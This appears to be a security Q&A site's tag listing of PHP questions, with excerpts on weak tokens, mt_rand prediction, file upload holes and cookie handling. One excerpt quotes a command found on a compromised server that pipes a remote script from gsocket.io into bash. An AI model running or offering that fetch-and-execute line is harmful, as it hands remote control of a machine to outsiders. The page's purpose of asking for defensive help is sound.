
Questions tagged [php]

Security aspects concerning code written in the programming language PHP which is often used for web applications.

0 votes
0 answers
84 views

I'm experimenting with old PHP (5.3.10) code that uses the now-deprecated /e modifier in preg_replace. I understand /e evaluates the replacement string as PHP code. Example <?php $string = 'phpinfo(...
nebilx (reputation 1)
1 vote
2 answers
127 views

I'm running a WordPress instance for a dropshipping site and have implemented some of the common security practices. One of these involves redirecting access attempts to known attack surfaces (e.g., /...
user267502
2 votes
0 answers
93 views

TL;DR: seeing a website attack that's new to us, wondering if it is a known thing, or if it's directed at some framework that we're not using. The attack is against a site's index.php script and feeds ...
Tom Swiss
0 votes
2 answers
247 views

I've been researching the best ways and practices for handling remember-me cookies for my website's users so that they have active sessions and stay logged in for 30 days. These articles here for ...
Absorbent-Sponge
0 votes
1 answer
120 views

I’ve developed a web interface that allows users to install or remove specific game addons. The site is hosted with Nginx, uses PHP on the backend, and is served over HTTPS. To perform an installation ...
sirzento (reputation 101)
-2 votes
1 answer
115 views

I'm reviewing a PHP library that interacts with an Informix database. Since I'm following the library structure I cannot use PDO. Is there a guideline on how to properly protect an Informix query ...
Marco Nappi
1 vote
1 answer
76 views

Does PHP's Composer package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? I see a lot of guides ...
Michael Altfield
1 vote
0 answers
106 views

I have a situation where a webserver behind a network firewall is run inside of Docker containers. It is set up in this order: Caddy webserver - acts as WAF, GEOIP block, IP blacklist, HTTP Security ...
Bob Ortiz (reputation 7,725)
6 votes
1 answer
2k views

I need to encrypt and decrypt some passwords in PHP. Normally I would hash them, but I need to be able to decrypt them again because they're keys for an external service. I googled around a bit, but ...
mpen (reputation 180)
0 votes
0 answers
22 views

My customer's server has been compromised. They are running this script via a PHP script: bash -c "$(curl -fsSL https://gsocket.io/x)" and I have several folders in /tmp as below -rw------- 1 ...
Yohanes AI
2 votes
2 answers
955 views

I'm hosting a website on a free hosting provider server that uses PHP for OTP-based authentication. Here’s how it works: If an unregistered IP address visits the site, it shows an "Unauthorized"...
Akhil Akkapelli
1 vote
0 answers
116 views

I am creating an exercise for my users, where I am trying to tell them that using mt_rand() is not a good option from a security point of view. What I did is that I showed them a normal user who gets a ...
Johnny (reputation 343)
0 votes
2 answers
237 views

I was going through this article, https://www.ambionics.io/blog/php-mt-rand-prediction, which claims that if we use mt_rand(), we can get the seed value using two values instead of brute forcing. In ...
Johnny (reputation 343)
11 votes
3 answers
3k views

I am using the following code in my code to send a password reset token to a user. $token = md5($user_id . time()); Why is this considered a bad approach, cited as having weak entropy? The ...
Johnny (reputation 343)
0 votes
1 answer
493 views

I am testing a web application and I found a file upload vulnerability where I can upload php files to the server with the ability to know the path. The issue is that when I go to the file path, the ...
0xx7 (reputation 1)
